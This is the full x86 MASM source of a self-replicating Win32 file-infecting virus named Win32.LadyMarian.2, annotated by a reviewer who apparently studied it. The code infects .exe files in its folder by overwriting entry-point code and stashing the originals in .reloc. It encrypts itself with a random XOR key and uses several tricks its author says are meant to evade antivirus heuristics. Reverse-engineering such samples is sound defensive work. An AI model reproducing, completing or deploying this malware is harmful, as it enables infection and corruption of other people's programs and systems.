;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;
;
; Win32.LadyMarian.2
; Coded By ValleZ.
; Size: 848h bytes.
;
; This is my second virus and probably virus had not optimized code,or bad ideas,or
; other things,but,as i said,its my second so im excused :P if its a lame virus.
; Well,i thing this is a interesting virus becoz it infect with a method that i hadnt seen
; before(however i dont say it no exist,but i havent seen it). Virus overwrite code
; of host,over entry point,after it has copy host code in .reloc.When it returns to host
; it copy again host to entry point and jmp there.Virus place return to host rutine in
; imagebase + 26h, in word oeminfo and 5 * dword reserved.
; Virus is encrypted with random key.
; Virus no change flags of code section where it overwrite code of host becoz avs heuristic
; could detect it. It use VirtualProtect api to set his memory as writable.
; I want to include some antidebug rutines in virus code but finally i think better not
; becoz size of virus is 848h bytes...and if it grow up very much probably it cannot infect
; any file becoz it will be more big than reloc.
; Virus doesnt increase size of file and no change entry point.
; It places his own SEH and test files with SfcIsFileProtected api when sfc.dll exists.
; It infects all files in his folder that can be infected.
; In NT machines only infect if it has necesary permission.
; In header it only change: ImageBase + 26h to ImageBase + 3ch,with code to return host.
; Byte 1 of TimeDateStamp in PEheader + 08h.
; Flags of .reloc to do it not discarcheable.
;
;
; Payload: show a message box with no button :P close it with ctrl + alt + supr
; No more things.
; This virus is for Lady Mariam,the best girl in the world.
;
; Thx:
; Xezaw,my m3nt0r who shows me all i know :)
; mscorlib,thx for that help that u gave me :) u r a genius :D
; GriYo,thx u too for ur help too :)
;
; Sorry,my english is very bad so plz,excuse me.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;-----------------------------------------------------------------------
; [review] Analyst notes added on review. The code is unchanged; these
; comments only describe what the visible instructions do.
;
; Assembler/ABI: MASM (.586p, .model flat,stdcall), Win32 x86. The file is
; one flat code stream driven by labels and fall-through; only
; SetWritableCode and compara are used as call/ret subroutines.
;
; Layout of the body that is copied into hosts (startVir..endVir = sizeVir):
;   startVir..retHost  : register saves, delta offset in ebp, jmp decryptz
;   retHost..decryptz  : the region that is XOR-encrypted on disk
;                        (sizecrypt) with a one-byte key from GetTickCount
;   decryptz..endVir   : clear-text decryptor, SetWritableCode, compara, VP
;
; On-disk artifacts an analyst can key on (each is written by code below):
;   - word 'vz' stored at PE header + 08h (low word of TimeDateStamp) as
;     the infection marker; it is checked before infecting and again when
;     the body runs inside a host (retHost)
;   - the ReturnHost stub copied to DOS header offset 26h (tamReturn bytes;
;     the author describes the area as e_oeminfo plus the reserved dwords)
;   - the .reloc section's VirtualAddress stored in the DOS header dword at
;     offset 1Ch, read back at retHost to find the parked host bytes
;   - .reloc Characteristics overwritten with 40000040h
;   - sizeVir host bytes at the entry-point file offset replaced by the
;     body; the originals are parked at the start of .reloc's raw data.
;     File size and AddressOfEntryPoint are not changed.
; Targets: names matching '*.exe' via FindFirstFileA/FindNextFileA; the
; pattern is relative, so this is the current working directory.
; Payload: MessageBoxA when GetSystemTime reports month 7 / day 23, on the
; GetVersion branch the author labels 9x (see the note at Payload:).
;-----------------------------------------------------------------------

.586p
.model flat,stdcall

extrn ExitProcess:proc          ; [review] the only real import; used on the
                                ; "not infected" path at Exit: only

sizeVir = endVir - startVir
sizecrypt = decryptz - retHost
.data
        db 0
.code
start:
startVir:
        ; [review] Body entry. Saves the six registers that the ReturnHost
        ; stub pops later, computes the load delta into ebp, then jumps over
        ; the encrypted region to the clear-text decryptor.
        push ebx ;registers preserved too
        push ecx
        push edx
        push esi
        push edi
        push ebp

        call d_offset ;delta offset
d_offset:
        pop ebp
        sub EBP,offset d_offset
        jmp decryptz
retHost:
SEHout:
        ; [review] Common exit/recovery point; also installed as the SEH
        ; handler at SEH: below. The 00000000h immediate is patched at run
        ; time with esp (mov dword ptr[ebp + offset SEHout + 1],esp), so the
        ; stack is reset whether we arrive by jmp or by exception.
        mov esp,00000000h

        pop dword ptr fs:[0] ;SEH return
        pop ebp
        pop ebp ;ebp too was saved,so we can restore it

        ; [review] Locate the image base: start at baseCalc rounded down to
        ; 100h and step back 100h at a time until 'MZ' is found.
        lea eax,[ebp + offset baseCalc]
        xor al,al

        xor ecx,ecx
        mov cx,100h
        add eax,ecx
baseCalc:
        sub eax,ecx
        cmp word ptr [eax],'ZM' ;search for image base
        jne baseCalc

        ; [review] DOS header dword 1Ch holds the .reloc VirtualAddress that
        ; the infector stored there (see "reloc dir for nxt gen" below).
        mov esi,[eax + 1ch] ;dir of reloc
        add esi,eax ;this header dword is modified
        ;when file is infected
        mov ecx, [eax+3Ch]
        add ecx, eax
        mov dx,[ecx + 8]
        cmp dx,'vz' ;test if this is a infected file,
        jne Exit ;second generation,i no test it with
        ;or ebp,ebp becoz
        ;with this infection method
        ;sometimes ebp = 0 in 2<> gen.

        ; [review] edi = body start (= host entry point), esi = .reloc in
        ; memory; control passes to the ReturnHost stub at image base + 26h.
        lea edi,[ebp + startVir]
        add eax,26h ;goto return code in image base + 26h

        jmp eax
Exit:
        ; [review] Not marked: leave via the carrier's ExitProcess thunk.
        push 0
        call ExitProcess

ReturnHost:

        ;return host code.It is put in dos
        ;header 5 reserved dwords + oeminfo.
        ; [review] Stub that lives in the DOS header of an infected file.
        ; Expects edi = entry point (body start), esi = parked host bytes in
        ; .reloc. Copies sizeVir+1 bytes back over the body, restores the
        ; registers saved at startVir and jumps to the restored entry point.
        mov eax,edi
        mov ecx,sizeVir + 1

again1: rep movsb ;copy host code in entry point direction
        jcxz next1 ;to recover the host body and
        loop again1 ;next jmp to entry point and begin
next1: ;execution of host.
        pop ebp
        pop edi
        pop esi ;i think some programs fails if not preserve
        pop edx
        pop ecx
        pop ebx
        jmp eax
ReturnHost_:


vir:
        ; [review] Reached after decryption (or directly when the body is
        ; not encrypted). SfcIsFileProtectedz is cleared first so a failed
        ; sfc.dll load below leaves it 0.
        xor edx,edx ;small fix :P
        mov [ebp + SfcIsFileProtectedz],edx ;sometimes fault becoz
        ;thought it has sfc api


        ;my SetWritrableCode rutine is prepared for with a few
        ;changes can search a api directly from export.
        ;really,rutine search VirtualProtect for
        ;change virus pages to readable,writable and executable
        ;but putting GetProcAddress offset in repuse + 2 and
        ;putting a ret in a good site rutine will search
        ;GetProcAddress and we not spend bytes in repeat code ;)

        ; [review] Self-patching reuse of SetWritableCode: the string pointer
        ; inside its export walk (repuse + 2) is pointed at 'GetProcAddress',
        ; and the two bytes at repuse2 become 5B C3 (pop ebx / ret) so the
        ; routine returns with eax = GetProcAddress instead of calling
        ; VirtualProtect. The patches are undone right after the call so the
        ; copy written into the next host has the original bytes.
        mov eax,offset GPA
        mov dword ptr [ebp + repuse + 2],eax
        mov ax,0c35bh ;pop ebx,ret
        mov word ptr [ebp + repuse2],ax
        lea eax,[ebp + SetWritableCode]
        call eax

        ;of course after use rutine for our propose
        ;we must rewrite good offset of VP and good code
        ;where we write ret becoz when infect next generation
        ;file the code of rutine must be the first


        lea ebx,[ebp + offset VP]
        mov dword ptr [ebp + repuse + 2],ebx
        mov cx,6a54h                    ; [review] restores 54 6A = push esp / push (40h)
        mov word ptr [ebp + repuse2],cx
        mov edi,[ebp + kern]            ; [review] kernel32 base stored by SetWritableCode
        mov [EBP + offset GetProcAddressz],EAX


        ;we have GetProcAddress,we can be happy! We can get all apis we need and
        ;we can start to infect files ;)
        ;next code calc apis
        ;In data apis must be in this form:
        ;api1kernel 0 api2kernel 0 ... apiNkernel 00 Library1nxt 0 api1nxtLib 0 api2nxtLib 0
        ;... apiNnxtLib 00 ... LibreriaNnxt 000
        ;00 is change of library and 000 is finish of apis


        ; [review] Resolver loop: esi walks ApisNames, ebx = current module
        ; handle (kernel32 first), edx = next slot in dirApis. Slots are
        ; filled in the same order as the names, so dirApis must mirror
        ; ApisNames one-to-one.
        lea ESI,[EBP + offset ApisNames]
        mov ebx,edi
        mov ECX,[EBP + offset GetProcAddressz]
        lea EDX,[EBP + offset dirApis]

nextAPI:

        push EDX
        push ESI
        push ebx
        mov edx,[ebp + GetProcAddressz]
        call edx
        pop EDX
        mov [EDX],EAX
        add EDX,4h
searchApis:
        ; [review] Skip to the terminator of the current name.
        inc ESI
        mov AL,byte ptr[ESI]
        or AL,AL
        jnz searchApis

        ; [review] One 0: another name in the same module; two 0s: a
        ; library name follows; three 0s: end of the list.
        inc ESI
        mov AL,byte ptr[ESI]
        or AL,al
        jnz nextAPI

        inc ESI
        mov AL,byte ptr[ESI]
        or AL,al
        jz allApisFounds


        push EDX

        ; [review] This compare/jump targets the very next label, so it has
        ; no effect on control flow.
        cmp ebx,[EBP + offset kern]
        je IsKern

IsKern: push ESI
        mov eax,dword ptr [ebp + offset LoadLibraryAz]
        call eax
        or eax,eax ;because of sfc.dll on 9x
        jz allApisButSfcNot

        mov EBX,EAX
        pop EDX

        jmp searchApis


allApisButSfcNot:
        ; [review] LoadLibraryA returned 0 (no sfc.dll): drop the saved slot
        ; pointer and continue with SfcIsFileProtectedz still 0, which the
        ; _9x: path treats as "no SFC check available".
        pop edx
allApisFounds:


SEH: ;set SEH for me,save ebp too

        ; [review] Frame pushed here, top to bottom: previous fs:[0],
        ; handler = retHost, saved ebp. retHost pops exactly these three.
        push ebp
        lea eax,[ebp + retHost]
        push eax
        mov eax,fs:[0]
        push eax
        mov fs:[0],esp
        mov dword ptr[ebp + offset SEHout + 1],esp



        ;payload only show a message box if 23-7-XX,but when i had a moment ill put some payload
        ;a few more original :P

Payload: ;payload (only 9x)

        ; [review] Branches on bit 31 of GetVersion(): set -> skip payload.
        ; NOTE(review): the "9x"/"NT" naming here and at infection: is the
        ; author's reading of that bit; confirm against the GetVersion
        ; documentation before relying on the labels.
        mov eax,dword ptr [ebp + offset GetVersionz]
        call eax
        test EAX,08000000h
        jnz FirstFile
        lea ESI, [EBP + offset SystemTime]
        push ESI
        mov eax,[EBP + offset GetSystemTimez]
        call eax
        cmp [ESI.ST_wMonth],7
        jne FirstFile
        cmp [ESI.ST_wDay],23
        jne FirstFile
        lea eax,[ebp + pay]
        lea esi,[ebp + paytit]
        push 07h
        push esi
        push eax
        push 0
        mov eax,dword ptr [ebp + offset MessageBoxAz]
        call eax

FirstFile: ;infect all .exe in his folder that could infect

        ; [review] FindFirstFileA('*.exe', &WIN32_FIND_DATA). inc/jz tests
        ; for INVALID_HANDLE_VALUE (-1); on failure control goes to retHost.
        lea eax,[ebp + offset files]
        lea ESI,[ebp + offset WIN32_FIND_DATA]
        push ESI
        push EAX
        mov eax,dword ptr [ebp + offset FindFirstFileAz]
        call eax
        inc eax
        jz retHost
        dec eax
        mov [ebp + handFile],eax
        jmp infection
NextFile:
        ; [review] Put the original attributes back (they were set to 80h at
        ; nosfc:) before moving on to the next candidate.
        push dword ptr [ebp+WFD_dwFileAttributes]
        lea eax, [ebp + WFD_szFileName]
        push eax
        mov eax,dword ptr [ebp + offset SetFileAttributesAz]
        call eax

        lea ESI,[ebp + offset WIN32_FIND_DATA]
        mov eax,[ebp + handFile]
        push esi
        push eax
        mov eax, dword ptr [ebp + offset FindNextFileAz]
        call eax
        or eax,eax
        jz retHost
infection:

        lea edi,[ebp + offset WFD_szFileName]
        mov eax,dword ptr [ebp + offset GetVersionz]
        call eax
        test EAX,08000000h
        jz _9x
NT:

        ;in NT only infect if have permiss

        ; [review] Skips the file when any attribute bit in 1915h is set.
        mov eax,[ebp + offset WFD_dwFileAttributes]
        test eax,1915h
        jnz NextFile

_9x: ;sfp?? i test it for NT and 9x becoz i have listened
        ;millenium have it too,true?

        ; [review] SfcIsFileProtected(NULL, name) when it was resolved;
        ; a non-zero result (protected) skips the file.
        push edi
        push 0
        mov eax,[ebp + SfcIsFileProtectedz]
        or eax,eax
        jz nosfc
        call eax
        or eax,eax
        jnz NextFile
nosfc:
        ;next part is tipycal file mapping

        ; [review] SetFileAttributesA(name, 80h = FILE_ATTRIBUTE_NORMAL), then
        ; CreateFileA(name, GENERIC_READ|GENERIC_WRITE (0C0000000h),
        ; share 1, NULL, OPEN_EXISTING (3), 0, NULL).
        push 80h
        push edi
        mov eax, dword ptr[ebp + offset SetFileAttributesAz]
        call eax
        xor eax,eax
        push eax
        push eax
        push 3
        push eax
        inc eax
        push eax
        push 0C0000000h
        push edi
        mov eax,dword ptr [ebp + offset CreateFileAz]
        call eax
        inc eax
        or eax,eax
        jz Closed
        dec eax
        mov [ebp + offset CreateFileHand],eax
        ; [review] CreateFileMappingA(h, NULL, PAGE_READWRITE (4), 0,
        ; nFileSizeLow, NULL); the whole file is mapped with
        ; FILE_MAP_ALL_ACCESS (0F001Fh) so header and sections are written
        ; through the view.
        xor ebx,ebx
        push ebx
        push dword ptr[ebp+ offset WFD_nFileSizeLow]
        push ebx
        push 4
        push ebx
        push eax
        mov eax, dword ptr [ebp + offset CreateFileMappingAz]
        call eax
        or eax,eax
        jz CloseFile
        mov [ebp + offset CreateFileMappingHand],eax
        push dword ptr[ebp + offset WFD_nFileSizeLow]
        xor ebx,ebx
        push ebx
        push ebx
        push 000F001Fh
        push eax
        mov eax, dword ptr [ebp + offset MapViewOfFilez]
        call eax
        or eax,eax
        jz CloseMapping
        mov [ebp + offset MapViewOfFileHand],eax
        mov edi,eax                     ; [review] edi = mapped file base
        ; [review] Candidate filter: 'MZ', e_cparhdr (offset 8) == 4, 'PE'
        ; at e_lfanew, and the 'vz' marker not yet present.
        cmp word ptr [edi],'ZM' ;test if PE file
        jne CloseView
        cmp word ptr[edi + 8],4
        jne CloseView
        mov esi,[edi + 3ch]
        add esi,edi                     ; [review] esi = PE header
        cmp word ptr[esi],'EP'
        jne CloseView
        mov ax,[esi + 8] ;not infected yet??
        cmp ax,'vz'
        je CloseView
        mov eax,[esi + 28h]             ; [review] eax = AddressOfEntryPoint (RVA)

        ; [review] ebx = first section header = PE + 18h + SizeOfOptionalHeader.
        xor ebx,ebx
        mov bx,word ptr[esi + 14h]
        add ebx,18h
        add ebx,esi
        push ebx

BuscaEntrySec:
        ; [review] ecx = VirtualAddress + SizeOfRawData of the section; the
        ; first section whose end lies above the entry point is taken.
        mov ecx,dword ptr[ebx + 0ch]
        add ecx,dword ptr[ebx + 10h] ;search for entryPoint section,
        cmp eax,ecx ;the section where is entryPoint.
        jb EntrySection
        add ebx,28h
        jmp BuscaEntrySec

EntrySection:
        mov edx,[esi + 28h]
        sub edx,[ebx + 0ch]
        add edx,[ebx + 14h] ;offset of Epoint in file.No RVA.
        add edx,edi
        ;AddressOfEntryPoint - VAsection + PointerToRawData

        mov [ebp + offset EntryPointInFile],edx

        sub ecx,eax ;SectionEnd - entryPoint

        ; [review] Abort unless at least sizeVir bytes remain between the
        ; entry point and the end of its section.
        mov eax,sizeVir
        cmp ecx,eax
        jb nxt ;enought size for put virus?
        jmp nonxt

nxt:
        pop ebx
        jmp CloseView

nonxt:

        ; [review] Walk all NumberOfSections (PE + 6) headers from the first
        ; one, comparing each Name with '.reloc' through compara.
        mov ecx,eax
        pop ebx
        push ecx
        mov cx,[esi + 6]
        sub ebx,28h
        inc cx
buscaReloc:

        dec cx ;searching for reloc
        or cx,cx
        jz nxt2
        jmp nonxt2

nxt2:
        pop ecx ;no .reloc
        jmp CloseView
nonxt2:
        add ebx,28h ;is this section .reloc?? compare...
        lea eax,[ebp + offset reloc]
        push ebx
        push eax
        lea eax,[ebp + offset compara]
        call eax
        pop edx
        pop edx
        or eax,eax
        jne buscaReloc

        ; [review] .reloc's SizeOfRawData must hold sizeVir bytes.
        pop ecx
        cmp dword ptr [ebx + 10h],ecx
        ;enought space in reloc for virus?

        jb CloseView

        ; [review] Saved for later: ebx = .reloc header, esi = PE header.
        ; The .reloc VirtualAddress goes into DOS header dword 1Ch, which is
        ; what retHost reads back to find the parked host bytes.
        push ebx
        push esi
        mov eax,dword ptr [ebx + 0ch]
        mov [edi + 1ch],eax ;reloc dir for nxt gen
        mov ebx,[ebx + 14h] ;go start .reloc
        add ebx,edi

        ;copy return to host code to imagebase + 26h,overwriting oeminfo and next 5 reverved word.
        ;returnHost is 22 bytes, word oeminfo + 5 * dword reserveds ;)

CopyToReserved:

        add edi,26h
        lea esi,[ebp + offset ReturnHost]
        tamReturn = ReturnHost_ - ReturnHost
        xor ecx,ecx
        mov cl,tamReturn

again2: rep movsb ;copying...
        jcxz next2
        loop again2
next2:

        ; [review] Park sizeVir+1 host bytes from the entry point at the
        ; start of .reloc's raw data.
CopyReloc: mov esi,[ebp + offset EntryPointInFile]
        mov edi,ebx


        mov ecx,sizeVir+1 ;copy host in reloc for recover later...
again3: rep movsb
        jcxz next3
        loop again3
next3:


        ; [review] Write the body (sizeVir bytes, currently decrypted in
        ; memory) over the host entry point in the mapped file.
        lea esi,[ebp + offset startVir]
        mov edi,[ebp + offset EntryPointInFile]
        mov eax,edi


        mov ecx,sizeVir ;copying...
again4: rep movsb ;overwriting host with virus >:D
        jcxz next4
        loop again4
next4:


        sizedecrypt = endVir - decryptz

        ; [review] edi is now EP + sizeVir; subtracting sizedecrypt leaves it
        ; at the file copy of decryptz. The loop then XORs sizecrypt bytes
        ; backwards down to retHost with the low byte of GetTickCount, so
        ; only the retHost..decryptz region is encrypted on disk and the key
        ; differs per infection.
        sub edi,sizedecrypt
        mov ecx,sizecrypt
        mov eax,[ebp + GetTickCountz]
        call eax
cryptaz:
        dec edi ;crypt byte to byte with random key
        xor byte ptr[edi],al
        loop cryptaz

        pop esi
        pop ebx

        ; [review] Section Characteristics of .reloc rewritten.
        mov dword ptr [ebx + 24h],40000040h
        ;reloc not discarchable!!
        ;i think avs no see this flag ;)

CloseHandlesInfectado:
        ; [review] Infection marker: 'vz' into the low word of TimeDateStamp.
        mov ax,'vz'
        mov [esi + 8],ax

CloseView:
        push dword ptr[ebp + offset MapViewOfFileHand]
        mov eax, dword ptr [ebp + offset UnmapViewOfFilez]
        call eax
CloseMapping:
        push dword ptr[ebp + offset CreateFileMappingHand]
        mov eax,dword ptr[ebp + offset CloseHandlez]
        call eax
CloseFile:
        push dword ptr[ebp + offset CreateFileHand]
        mov eax, dword ptr[ebp + offset CloseHandlez]
        call eax
Closed:
        jmp NextFile


datos:
kernel32_ db 'Kernel32',0
reloc db '.reloc',0
GPA db 'GetProcAddress',0
files db '*.exe',0
pay db 'This virus is for you,for Lady Marian.',0dh
        db ' You are the only girl in the world',0dh
        db 'whose i have in loved and never other girl',0dh
        db ' could be in my heart so you have been.',0dh
paytit db ' i will not forget you...',0

        ; [review] Name list consumed by the resolver loop at nextAPI:; order
        ; must match dirApis below. Single 0 separates names, a double 0
        ; introduces the next library name, the trailing dw 0 ends the list.
ApisNames:
        db 'LoadLibraryA',0
        db 'GetSystemTime',0
        db 'CreateFileA',0
        db 'CreateFileMappingA',0
        db 'MapViewOfFile',0
        db 'CloseHandle',0
        db 'UnmapViewOfFile',0
        db 'FindFirstFileA',0
        db 'FindNextFileA',0
        db 'GetTickCount',0
        db 'GetVersion',0
        db 'SetFileAttributesA',0
        db 'ExitProcess',0
        db 0
        db 'User32',0
        db 'MessageBoxA',0
        db 0
        db 'sfc',0
        db 'SfcIsFileProtected',0
finAPIS dw 00h


dirApis:
LoadLibraryAz dd 0
GetSystemTimez dd 0
CreateFileAz dd 0
CreateFileMappingAz dd 0
MapViewOfFilez dd 0
CloseHandlez dd 0
UnmapViewOfFilez dd 0
FindFirstFileAz dd 0
FindNextFileAz dd 0
GetTickCountz dd 0
GetVersionz dd 0
SetFileAttributesAz dd 0
ExitProcessz dd 0
MessageBoxAz dd 0
SfcIsFileProtectedz dd 0


CreateFileHand dd 0
CreateFileMappingHand dd 0
MapViewOfFileHand dd 0
EntryPointInFile dd 0
handFile dd 0
GetProcAddressz dd 0


Max_Path equ 260

FILETIME struc
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ends

WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db Max_Path dup (?)
WFD_szAlternateFileName db 13 dup (?)
        db 03 dup (?)

SYSTEMTIME struct
ST_wYear dw ?
ST_wMonth dw ?
ST_wDayOfWeek dw ?
ST_wDay dw ?
ST_wHour dw ?
ST_wMinute dw ?
ST_wSecond dw ?
ST_wMilliseconds dw ?
SYSTEMTIME ends
SystemTime SYSTEMTIME ?

decryptz:

        ; [review] Clear-text part. First makes the body writable (see
        ; SetWritableCode), then decides whether decryption is needed.
        call SetWritableCode

        ; [review] 0BCh is the opcode of 'mov esp,imm32' at retHost; if it
        ; is already there the region is in clear (first generation).
        cmp byte ptr [ebp + offset retHost],0BCh ;encrypted??
        je vir ;if no encryted jmp code
        ; [review] Key recovery: try cl = 0FFh down to 1 until the first
        ; encrypted byte XOR cl equals 0BCh.
        xor ecx,ecx
        dec ecx
whatkey:
        mov al,byte ptr [ebp + retHost]
        ;search the encryption key
        xor al,cl
        sub al,0bch
        jz keyfound
        loop whatkey

keyfound:
        ; [review] In-place XOR of sizecrypt bytes with the recovered key.
        mov dl,cl
        lea esi,[ebp + offset retHost]
        mov edi,esi
        mov ecx,sizecrypt
decrypt:
        db 0d6h ;setalc,undocumented,antiheuristic,is good today???
        lodsb
        xor al,dl
        stosb
        loop decrypt
        jmp vir

        ;SetWritableCode rutine searchs VirtualProtect in kernel export table for calling it
        ;later and do writable virus code memory zone.Why? Virus code is on code section
        ;and if code section flags say writable section,avs will see it and will advise
        ;user that infect file is a posible virus :S so we no set that flag and avs will be
        ;in silent :)
        ;In addition with a few modifications explanated and do up,this rutine will search
        ;getProcAddress so we dont spend bytes in repeat code ;)


SetWritableCode:
        ; [review] Both call sites (decryptz: and vir:) reach here with the
        ; same stack depth: six saved registers plus the return address, so
        ; [esp + 28] is the dword that was on the stack when the body was
        ; entered. NOTE(review): it is treated as an address inside
        ; kernel32 (presumably the loader's return address) and the 'MZ'
        ; scan below walks down 1000h at a time from its 64K boundary —
        ; confirm against the target loaders.
        mov EAX,[ESP + 28]
        xor AX,AX
        mov edx,1000h
        add eax,edx

VPsearch_kernel:
        sub eax,edx
        mov CX,word ptr[EAX]
        cmp CX, 'ZM'
        jne VPsearch_kernel
        mov edi,eax                     ; [review] edi = kernel32 base
        mov EAX,[EAX + 3Ch] ;PE
        add EAX,edi
        mov EAX,[EAX + 78h] ;Dir entrys

        add EAX,edi ;export table

        push eax                        ; [review] [esp] = export directory for the rest

        ; [review] Walk AddressOfNames (export + 20h); edx counts 2 per name
        ; so it indexes the word-sized ordinal table directly. The name
        ; compared against is whatever pointer the instruction at repuse
        ; holds (VP by default, GPA while patched by vir:).

        mov ECX,[EAX + 20h] ;exported func names
        add ECX,edi
        xor EDX,EDX
VPrepeat:
        mov EBX,[ECX]
        add EBX,edi

        PUSH EBX ;search GetProcAddress
repuse:
        lea EBX,[EBP + offset VP]
        PUSH EBX
        lea ebx,[ebp + offset compara]
        call ebx
        POP EBX
        POP EBX
        or EAX,eax
        jz VPfinality
        add ECX,4
        inc edx
        inc edx
        jmp VPrepeat ;edx index ordinal

VPfinality:
        ; [review] AddressOfNameOrdinals (export + 24h) indexed by edx.
        ; NOTE(review): a dword is loaded from the word-sized table and its
        ; high word minus one is used, i.e. the next entry's ordinal - 1;
        ; that equals this entry's ordinal only when ordinals are
        ; consecutive in name order — confirm against the target kernel32.
        mov EAX,[esp]
        mov EAX,[EAX + 24h]
        add EAX,edi ;eax -> ordinal
        add EAX,EDX ;add index
        mov EAX,[EAX] ;index for export address table
        shr EAX,10h

        dec EAX
        mov EBX,[esp]
        mov EBX,[EBX + 1ch] ;array of dirs of func
        add EBX,edi ;we index it in eax
        add EAX,EAX
        add EAX,EAX
        add EAX,EBX
        mov EAX,[EAX] ;dir of VirtualProtect
        add EAX,edi
repuse2:
        ; [review] VirtualProtect(startVir, sizeVir, 40h, &old). The old
        ; protection is written into the export-directory slot pushed above,
        ; which 'pop eax' then discards. While vir: has patched these two
        ; bytes to pop ebx / ret, the routine returns here instead.
        push esp ;lpflOldProtect is a stack dword
        push 40h ;writable,readable and executable
        push sizeVir ;size of memory to put writable
        lea ebx,[ebp + startVir]
        push ebx
        call eax
        pop eax
        mov [ebp + kern],edi
        ret

        ;this useful ritune compare 2 strings and return 0 if they are identical and 1 if not.

compara:

        ; [review] Arguments on the stack: [esp+20] = first-pushed string
        ; (its length, including the terminator, sets the compare length),
        ; [esp+16] = second-pushed string. Returns eax = 0 on match, 1
        ; otherwise; preserves ecx, esi, edi.
        push ECX
        push ESI
        push edi

        mov ESI,[ESP + 20]
        mov EDI,[ESP + 16]
        mov ecx,esi
endString:
        lodsb ;lenght of string
        or al,al
        jnz endString

        sub esi,ecx
        xchg esi,ecx ;ecx = lenght esi = start

        xor eax,eax

        repz cmpsb
        je endCompara
        inc eax
endCompara:
        pop edi
        POP ESI
        POP ECX

        ret

        ;arrrggghtt!! damn,i have had headache becoz i was using VP string before decrypt it!! ;@

VP db 'VirtualProtect',0
kern dd 0
endVir:
end start
end